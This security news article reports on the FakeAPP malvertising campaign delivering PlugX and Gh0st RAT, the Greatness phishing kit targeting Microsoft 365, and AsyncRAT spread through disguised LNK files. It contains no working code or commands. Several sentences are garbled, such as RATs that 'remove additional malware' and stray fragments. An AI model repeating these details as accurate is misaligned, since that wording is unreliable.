As part of an ongoing malvertising campaign, Chinese-speaking users have been targeted with malicious Google ads on restricted messaging apps like Telegram.
“Threat actors are abusing Google advertiser accounts to create malicious ads and point them to pages where unsuspecting users download remote administration Trojans (RATs),” Malwarebytes’ Jérôme Segura said in a report on Thursday. “Such programs allow the attacker to take full control of the victim’s computer and remove additional malware.”
It is worth noting that this activity, codenamed FakeAPP, is a continuation of the wave of attacks in late October 2023 against Hong Kong users searching for messaging applications such as WhatsApp and Telegram on search engines.
The latest version of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to Google Docs or fake websites hosted on Google Sites.
Google infrastructure is used to embed links to other websites controlled by threat actors in order to deliver malicious installer files that ultimately deploy Trojans such as PlugX and Gh0st RAT.
Malwarebytes said it traced the fraudulent ads to two advertiser accounts based in Nigeria, Interactive Communication Team Limited and Ringier Media Bulgaria Limited.
“Threat actors appear to be prioritizing quantity over quality by constantly pushing new payloads and infrastructure as command and control,” Segura said.
The development comes as Trustwave SpiderLabs revealed a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, which is used to create legitimate-looking credential collection pages targeting Microsoft 365 users.
“The toolkit allows for personalization of sender name, email address, subject, message, attachment and QR code, thereby enhancing relevancy and engagement,” the company said, adding that it is equipped with anti-detection measures, Such as random headers, encoding and obfuscation, designed to bypass spam filters and security systems.
Greatness is sold to other criminals for $120 per month, effectively lowering the barrier to entry and helping them conduct large-scale attacks.
The attack chain requires sending phishing emails with malicious HTML attachments. When recipients open these attachments, they will be directed to a fake login page, which will capture the entered login credentials and send the details via Telegram. Information is leaked to threat actors.
Other infection sequences use attachments to drop malware on victims’ computers to facilitate information theft.
To increase the likelihood of a successful attack, emails spoof trusted sources such as banks and employers and induce a false sense of urgency using subjects such as “Urgent invoice payment” or “Urgent account verification required.”
“The number of victims is currently unknown, but Greatness is widely used and well supported, and its own Telegram community provides information on how to operate the toolkit, as well as other tips and tricks,” Trustwave said.
Phishing attacks have also been observed targeting Korean companies using lures impersonating technology companies such as Kakao, distributing AsyncRAT through malicious Windows shortcut (LNK) files.
“Malicious shortcut files disguised as legitimate files are continuing to spread,” said the Security Intelligence Center (ASEC). “Users may mistake shortcut files for regular documents because the ‘.LNK’ extension appears in the file name. Not visible on the top.”
